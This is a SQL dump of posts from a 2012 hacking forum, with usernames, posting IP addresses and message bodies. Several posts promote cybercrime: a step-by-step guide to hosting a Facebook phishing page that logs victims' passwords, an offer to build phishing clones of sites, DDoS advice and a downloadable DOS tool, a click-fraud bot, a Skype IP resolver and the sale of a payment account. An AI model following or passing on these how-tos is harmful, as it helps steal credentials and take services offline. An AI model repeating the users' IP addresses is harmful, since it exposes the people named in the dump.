'ab103c1cbe10d4ba24d09527a9d564ad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('288', '109', '285', '4', 'RE: Sin Cara Here', '0', '1', 't3h jok3r', '1345049514', '[quote=\'Sin Cara\' pid=\'285\' dateline=\'1345012825\'] Thanks for saying me welcome :) [/quote] No problem. Hope you enjoy your stay on L33T Hacking', '41.174.14.17', '699272721', '1', '0', '0', '0', '1', '42ab864eaa10741009ab44e8697841ee', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('289', '105', '256', '11', 'RE: DDos', '0', '1', 't3h jok3r', '1345051192', 'You can use a DDoSer or Booter because this site is not under cloudflare protection. I would recommend using http://l33thacking.com/showthread.php?tid=29 OR http://l33thacking.com/showthread.php?tid=48', '41.174.14.17', '699272721', '1', '0', '0', '0', '1', '132a334fefc531cc4daf34ef101d41f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('290', '115', '0', '48', '[tut] How to Moderate LH as a MOD', '0', '1', 't3h jok3r', '1345052054', 'This is a quick tutorial/guide on how to Moderate LH as a MOD and what actions to take. [u][b][size=large]Forum Actions[/size][/b][/u] [u][b]Split[/u][/b] For example... If someone posted a question and someone else posts their own question in someone elses thread. Then you select the post then go to moderation options and select [i]split thread[/i]. You will basically create a new thread in any forum of your choice. [u][b]Junk[/b][/u] Junk:- Automatically move a thread to our trash/junk forum. Only move threads that violate LH rules and regulations. You can junk a thread from the thread listing index. [spoiler][img]http://img98.imageshack.us/img98/8594/testqx.png[/img][/spoiler] Here is an example of the outcome [spoiler][img]http://img577.imageshack.us/img577/235/testpf.png[/img][/spoiler] So basically the threads title will change to [junk]TITLE, the moderator who posted it will auto post(this increase their post and we know who did it) and the thread gets closed. [size=large][u][b]NOTES[/b][/u][/size] Close all answered threads in the [b]Announcements, Feedback, Bugs and Suggestions[/b]. Close threads that contain infected links and edit the Original Post.', '41.174.14.17', '699272721', '1', '0', '1', '1347485546', '1', 'e6f1addb68e8d11f8fed55f0afb2eaa5', '0', '1347485546'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('291', '91', '219', '42', 'RE: Gold-medal swimmer admits to cheating in 100 breaststroke', '0', '1', 't3h jok3r', '1345057300', 'I agree he didn\'t deserve it but he was honest as well.', '41.174.53.103', '699282791', '1', '0', '0', '0', '1', 'bfdf899bac1782c6a40d6e1eda7459a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('292', '114', '287', '19', '[Junk]Havij', '0', '1', 't3h jok3r', '1345059665', 'This thread has been junked.', '41.174.4.140', '699270284', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('293', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '1', 't3h jok3r', '1345061282', 'I have added some attachments. Hope you guys like it.', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', 'e4627ee0db5f257e1b2af9b11623cb75', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('294', '116', '0', '43', '[tut] Creating a Kindle PID', '0', '1', 't3h jok3r', '1345061796', 'o first up the PID generator is not meant to give you instant gratification it rather gives you several codes over several points spent... to compare and contrast how you are going to crack the code and you are essentially a Manuel Bruteforce with a brain which means that if that code line doesn\'t see to be yielding results you go to another and not just blundering through blindly. In using this TUT You will be able to find your own PID\'s for amazons Kindle DX or any other kindle and for that matter most any other product that is available via the generator or any PID that you find just take 2 or 3 of them and compare the differences and mix it up. Now the way to do this is to get a PID from the generator which will look like this NOTE THIS CODE DOES NOT WORK SO DO NOT COMPLAIN THAT IT DOESN\'T. also note that I have gone through most of this but not all of it play with it and you will eventually get a good one if you get stumped use the generator as a randomizer and go again. B009 A1A0 1176 11F6 the first 3 sets of digits are the item and the last 4 are the number so what you want to do is find out which letters of the 4th section 3rd digit it will take I found that most commonly C,F,D,A,P will work so pick one of those. Then in the 4th digit in this case the 6 change it to B009 A1A0 1176 11F7 if that doesn\'t work try B009 A1A0 1176 11F8 and continue until you get B009 A1A0 1176 11F0 if all of those have not worked then we try this B009 A1A0 1176 11F0 change to B009 A1A0 1176 12F0 changing the second digit to 2 and then continue counting down 12F0, 13F0, 14F0 and so on until you get to 19F0 since the digit of 2 doesn\'t seem to ring anything leave it at that and go back to the fourth digit B009 A1A0 1176 19F0 change to B009 A1A0 1176 19F1 B009 A1A0 1176 19F2 and so on and when you get tired of this set go to a different letter and repeat the process eventually you WILL get an unused code, and like I said it takes time but its still worth it in the end That\'s all I can really tell you you are essentially manually cracking the code and ironically for me this is actually a fun process for me, In any case good luck and good SE\'ing.', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', '0e0141f8c85ca444b9fb0cc13bd3ba47', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('295', '31', '253', '7', 'RE: How long are you online daily?', '0', '1', 't3h jok3r', '1345062241', '[quote=\'spacefish36\' pid=\'253\' dateline=\'1344964543\'] About 2-4 hours maximum. I don\'t want to destroy my eyes :P [/quote] Lol, I\'m a computer nerd then because I wear glasses for far sight, I can\'t read small text from far. :whistle:', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', 'aa5030df5e3d76a838861752c5482129', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('296', '117', '0', '46', 'Facebook Phishin* Website [tut]with pictures', '0', '53', 'sirchamp', '1345062424', 'Hey guys Today ill show you how to make your own phishin* page [color=#2F4F4F]Requirements: [/color][color=#FFFFFF]-Php files (http://adf.ly/BvEq6 ) -Filezilla (http://adf.ly/BvEsO ) 1. Go to Funpic.de or any other webhosting website. Im doing the tutorial with Funpic.de 2. Now make an account there and go to the User centre of your account [img]http://i50.tinypic.com/ngvqr6.jpg[/img] 3. In the user centre press \"Webhosting FTP\" 4. Since Funpic.de is a german site i would use google translater on it. In Webhosting FTP press \"FTP Account anlegen/Make a FTP account\" 5. Now just write the settings you want. [img]http://i45.tinypic.com/3304she.jpg[/img] 6. Now start filezilla. [img]http://i50.tinypic.com/14119hv.jpg[/img] And login with the infos. 7. Now Upload the 2 Php files. Dont mind the login.txt, youll get that too later. [img]http://i45.tinypic.com/k48c3r.jpg[/img] 8. Now go to the website you made. Look in the Picture where to find the link [img]http://i47.tinypic.com/16nm37.jpg[/img] 9. Now when someone logs into the page you get his email and the password in the ftp under the login.txt file. If you have any questions feel free to ask me. I hope you liked it [/color]', '188.155.56.90', '-1130678182', '1', '0', '53', '1345105962', '1', '3fc1c8d1912ef76cd5b11f3bc092067d', '0', '1345105962'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('297', '118', '0', '19', '[Junk]Test son', '0', '1', 't3h jok3r', '1345062793', 'Just testing if others can view this thread.', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', 'e003958a1d9c9893734234687fc5b1b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('298', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '4', 'Triple H', '1345062874', 'The theme looks awesome. Never thought green and grey would get along.', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', '536c2f8e8d99c9bd850b935922fa89aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('299', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '4', 'Triple H', '1345062928', 'I would like a download link. Thanks, but is this sharecash or file ice?', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', 'ba0c9137e87e14cd7262d88552d69e2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('300', '119', '0', '49', 'Disallowed Suggestions', '0', '1', 't3h jok3r', '1345063750', 'These are the suggestions that will [b]NOT[/b] be allowed. 1. Chatbox/IRC/Shoutbox :- We won\'t allow a chatbox or anything similar and we have a lot of reasons why not to add a chatbox. 2. Moderator Suggestions :- We don\'t accept moderator suggestions, we don\'t care about which forum needs a moderator or who needs to be promoted because we pick staff on our discretion and people that we believe meet the requirements. We don\'t have any set requirements. 3. Theme Suggestions :- The admins of LH control the design of LH, we don\'t allow any suggestions however if you find any theme error or bug then those are meant to be posted in the [b]Announcements, Feedback, Bugs and Suggestions[/b] Forum. 4. Thanks or multi quote button :- We don\'t allow thanks or multi quote button for several reasons.', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', '054d2c16b083666bf72ac52c03863f53', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('301', '120', '0', '4', 'reloadz0r is here', '0', '62', 'R?????zo?', '1345064382', 'Hello, I\'m reloadz0r from HF. Some might know me and some not. I\'m mostly into GFX but I know some coding and I try to learn abit of everything. If you need GFX hit me up :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '2cdd44889306bdaebe72b13e4ff274da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('302', '121', '0', '21', 'kurosaki\'s DOS Tool', '0', '1', 't3h jok3r', '1345064939', 'Releasing a DOS tool for all you guys that like taking sites and xbl players down. Pretty strong. Preview: [img]http://i.imgur.com/Q52b8.png[/img] Download: http://www.mediafire.com/?h4un2hoyn5l10l1', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', 'cc522ddcc884ffffdf99361c41590ea0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('303', '90', '215', '24', 'RE: [tut]How to really hide your data from the cops', '0', '1', 't3h jok3r', '1345065077', 'No problem. So how did you find the tutorial?', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', 'e39f5edee7205e8d95bd4987d2b6c4f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('304', '122', '0', '24', '[tut] Increase your virtual RAM', '0', '1', 't3h jok3r', '1345065123', '[align=center][size=medium][b][color=cyan][color=#ffd700][font=Verdana][size=xx-large]Increase Virtual RAM - To Make Your System Faster[/size][/font][/color][/color][/b][/size] [size=medium][b][color=cyan][color=#ffd700][/color][/color][/b][/size][/align][size=medium][b][color=cyan][color=#FFD700][/color] Follow the steps given below :- [color=#FFD700]1)[/color] Hold down the \'Windows\' Key and Press the \'Pause/Break\' button at the top right of your keyboard. Another way is Right-Clicking \'My Computer\' and then Select \'Properties\'. [color=#FFD700]2)[/color] Click on the \'Advanced\' tab. [color=#FFD700]3)[/color] Under \'Performance\', click \'Settings\'. [color=#FFD700]4)[/color] Then click the \'Advanced\' tab on the button that pops up. [color=#FFD700]5)[/color] Under \'Virtual Memory\' at the bottom, click \'Change\'. [color=#FFD700]6)[/color] Click the \'Custom Size\' button. [color=#FFD700]7)[/color] For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000). [color=#FFD700]8)[/color] Click \'Set\', and then exit out of all of the windows. [color=#FFD700]9)[/color] Finally, Restart your computer. [color=#FFD700]10)[/color] You now have a faster computer and 1-2GB of Virtual RAM..![/color][/b][/size]', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', '743835aeb10573023632c3b69143ba2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('305', '123', '0', '14', 'Top 10 free VPNs', '0', '7', 'Romdu62', '1345065242', 'Top 10 best free VPNs Let\'s start. [b]1. OpenVPN[/b] OpenVPN.net is a SSL/TLS based VPN, it provides high security and privacy. The biggest difference between PPTP VPN and OpenVPN is you need install OpenVPN client software to use OpenVPN service, and OpenVPN DO NOT work on mobile devices such as iPhone, iPad, Windows Mobile and Android. But OpenVPN works on Windows, Mac and Linux. [b]2. PacketiX.NET[/b] PacketiX.NET is a Japan VPN service. It is actually a premium service, but they have PacketiX.NET online test service as well which is free to use. The service is fast and reliable and it is easy to use as well. Just download the VPN connection manager, install and connect! It works on Windows and Linux only. [b]3. UltraVPN [/b] UltraVPN is a French VPN client that hides your connection from unwanted ears and allows you to use blocked applications. It is also based on OpenVPN service. Traffic is quota is unlimited. Bandwidth is up to 500Kb/s depending on network conditions. [b]4. Hotspot Shield[/b] Hotspot Shield is possibly the most popular Free VPN client in the world. It made waves when Hulu was launched as it allowed users to watch Hulu even when it was blocked. Now, they have US & UK based VPN services which you can use to protect yourself from WiFi Snoopers, identity thefts and censorships. The best part is, Hotspot Shield provides unlimited bandwidth and works on both PC & Mac. [b]5. CyberGhost[/b] CyberGhost is a free VPN service from Germany which helps you route you through a German IP. The free service is limited to 1GB traffic every month, which is more than enough for surfing on websites, chatting and email. The paid service is also affordable. [b]6. TorVPN[/b] TorVPN is one of the latest entrants into the VPN market. TorVPN is great for bypassing strict content filters, browsing the web anonymously, securing your VOIP communications or remote access to your home/office workstation. With TorVPN you can get an OpenVPN server, SSH access, PPTP & TOR proxy. Free vpn access is restricted to 1GB per month and works on Windows, Mac, iPhone & iPad. [b]7. SecurityKiss[/b] SecurityKiss is a tunnel service which ensures security and privacy once your data leaves your computer. It redirects all your traffic through an impenetrable tunnel to our security gateway. Everything in the tunnel is encrypted. [b]8. Your-Freedom[/b] Your-Freedom makes accessible what is unaccessible to you, and it hides your network address from those who don’t need to know. The free service lets you use it for 6 hours a day (up to 15 hours a week). You can either download their software or use the OpenVPN mode. Windows, Mac & Linux platforms are supported. [b]9. USA IP[/b] For free user, you don’t need to register, just download the USAIP.pbk file, and then double-click on the file and select one of the USAIP PPTP connections. After that, you can access the USA IP free VPN services with the username demo and the password demo. But you will need to reconnect the USA IP network after [b]10. ProXPN[/b] A free VPN service designed for use with Windows and Mac computers. ProXPN works by downloading a small free application from which to connect. The service is also compatible with the iPhone and other mobile phones that support VPN. Interestingly you can use the iPhone setup instructions to make a connection from your PC, useful if you’re a Linux user.', '41.174.54.85', '699283029', '0', '0', '0', '0', '1', '5635a188b872a67b50c83fab22226a49', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('306', '104', '251', '33', 'RE: Photoshop vs Gimp', '0', '62', 'R?????zo?', '1345065247', 'Photoshop is alot more polished, stable and has the most options. GIMP is free, and has nearly the same.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c243483352f27b99cdc87670e7ed38c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('307', '38', '98', '16', 'RE: [tut] How to lie like a pro', '0', '7', 'Romdu62', '1345065323', 'This is some good ass tutorial.', '41.174.54.85', '699283029', '0', '0', '0', '0', '1', 'e1a7203bac0fa6644e1f857a44044fda', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('308', '96', '229', '30', 'RE: FBI Tools [11 in 1]', '0', '62', 'R?????zo?', '1345065354', 'will have a look. thanks for this', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '02f6724b62726a845abc30531b1a36b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('309', '111', '281', '29', 'RE: MyFreeCams Model Registeration', '0', '1', 't3h jok3r', '1345067423', '[quote=\'Apathy\' pid=\'281\' dateline=\'1344999265\'] I thought you ha said that this I private? [/quote] I sure did, but I decided to release it on my website.', '41.174.16.29', '699273245', '1', '0', '0', '0', '1', '73a146a5ea493c76c64f0499fdbae782', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('310', '105', '256', '11', 'RE: DDos', '0', '48', 'BurnsH4X', '1345068543', 'how would i know if it is under cloudflare protection?', '78.133.53.116', '1317352820', '0', '0', '0', '0', '1', '52d149cdadd5c4a7b1748f28c87bddc5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('311', '105', '256', '11', 'RE: DDos', '0', '1', 't3h jok3r', '1345072575', 'To find out if a website is using cloudflare protection, you have to find our what their sites nameservers are. If the nameservers contain SOMETHING.cloudflare.com then the site is under cloudflare protection.', '41.151.174.169', '697806505', '1', '0', '0', '0', '1', 'a80c0735b0ad92a41414b9d5539ba2d8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('312', '124', '0', '2', 'Line break mycode', '0', '1', 't3h jok3r', '1345073427', 'Testing the line break below <br> Did it work?', '41.151.174.169', '697806505', '1', '0', '1', '1345132983', '1', '2c59585ebc4a9c7cf4ee77568afc8380', '0', '1345132983'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('313', '125', '0', '29', '[ebook]How to talk to a Police Officer when in trouble[Whitehat]', '0', '1', 't3h jok3r', '1345075280', 'This is a 2 pages ebook on how to talk to a Police Officer when you are in trouble. This is a clean method. [b]Contents[/b] [list] [*]About to get a Ticket [*]Police Investigation on your property [*]Police Investigation out of your area. EX: Work or on streets [*]Search [*]Search on Computer [*]Disputing a ticket [/list] Download: http://www.mediafire.com/?9qj8hi5sz67iqlu', '41.151.174.169', '697806505', '1', '0', '0', '0', '1', '5c4cd008f032f9e60163499543d16b91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('314', '124', '312', '2', 'RE: Line break mycode', '0', '2', 'Apathy', '1345085966', 'Looks lik it did not no.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '62d693070735e1daf862e27dc1c5dfa1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('315', '126', '0', '15', 'Adf.ly Bot', '0', '53', 'sirchamp', '1345107167', 'Adf.ly Auto Clicker. [img]http://i46.tinypic.com/301lq3r.jpg[/img] [img]http://i46.tinypic.com/2e3x1ex.jpg[/img] [color=#000080]How to use:[/color][color=#FFFFFF] Start the .exe Then press right click and choose \"Add links\". You can add as many links as you want. Then press \"Enable Proxy\" and add your proxie list. Now press right click again and choose \"Start\" [/color][color=#000080]Features: [/color][color=#FFFFFF]Boost your adf.ly clicks. [/color][color=#000080]Virus scan:[/color][color=#FFFFFF] https://www.virustotal.com/file/d71bcb11d1d310e589e1cd0f286e73953dce3f55ec0834aaa1146100728ad1e1/analysis/ [lock][/color][color=#000080]Download link: [/color][color=#FFFFFF]http://adf.ly/BwHQr [/lock] [/color][color=#000080]Password: [/color][color=#FFFFFF]champ [/color]', '188.155.56.90', '-1130678182', '1', '0', '1', '1352011072', '1', '2414a6f99661f868c8972afb2c0fc09c', '0', '1352011072'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('316', '127', '0', '46', 'Will make you a phisher website with theme you request.', '0', '64', 'vlajke', '1345111892', 'Hello fellow members, i feel generous today and I will make a phisher website template fully functional for first 5 members who post below me. You just have to pick website you want to be copied and give me your email address. That\'s pretty much it, i will not create you a new website, i will just copy existing one you provide. >:) Cheers!', '178.223.56.85', '-1293993899', '0', '0', '0', '0', '1', '436d3b02ce5a3e9a6ed02f3bc0bcb267', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('317', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '53', 'sirchamp', '1345112703', 'Can i have a website? Thanks', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '6ac06f8caf6e0de468f2729d47ed8ea6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('318', '127', '317', '46', 'RE: Will make you a phisher website with theme you request.', '0', '64', 'vlajke', '1345113124', '[quote=\'sirchamp\' pid=\'317\' dateline=\'1345112703\'] Can i have a website? Thanks [/quote] Please correct the following errors before continuing: sirchamp has private messaging disabled. You cannot send private messages to this user.', '178.223.56.85', '-1293993899', '0', '0', '0', '0', '1', 'bea729272062dd2390150a1a78f9d37b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('319', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '53', 'sirchamp', '1345113267', 'Oh yeah^^. i corrected it.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'd3906642eba75bda98a9b98b5e362b81', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('320', '128', '0', '19', '[Junk]MoneyBookers acc with ~100$ on it.', '0', '64', 'vlajke', '1345116640', 'Hello guys, i\'d like to sell a moneybooker account, verified with CC that has 90$ on it. Kindly offer me a decent price, i can take payza, moneybookers or western union as payment option. Cheers', '178.223.56.85', '-1293993899', '0', '0', '0', '0', '1', '6199a3d3b9c781f4c793afce1f7d6055', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('321', '124', '312', '2', 'RE: Line break mycode', '0', '1', 't3h jok3r', '1345133049', 'Because, I deleted the mycode.', '41.174.8.31', '699271199', '1', '0', '0', '0', '1', 'a03ff3397fcfd3e99d73ab86b72bb995', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('323', '14', '39', '8', 'RE: Work Hard Play Hard-Rap', '0', '50', 'sana khan', '1345135064', 'i heard it first time bt like the song. thumbs up :)', '182.177.125.164', '-1229881948', '0', '0', '0', '0', '1', '44165932908fd3df22ce37cefafb2ed7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('324', '129', '0', '8', 'ss501 because i\'m stupid(korean)', '0', '50', 'sana khan', '1345135217', 'one of my favourite song.... [video=youtube]http://www.youtube.com/watch?v=feEUgiIABbk[/video]', '182.177.125.164', '-1229881948', '0', '0', '50', '1345135313', '1', '5b392c7561f664d584ad4ce1d410381d', '0', '1345135313'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('325', '130', '0', '15', 'Skype IP Finder - FREE', '0', '67', 'HoverCatz', '1345135783', 'Hey everyone. I made a quick program in VB.Net. It gets some information (Ip, etc) from a Skype username. I only take credits for the design (Not the theme), and putting the thing together. Screenshot: [img]http://gyazo.com/b3ac17c439fd16c45f558cac89cb7a44.png[/img] Download: [url=https://dl.dropbox.com/u/33062220/Skype%20IP%20Finder.exe]Click here[/url] Virustotal: 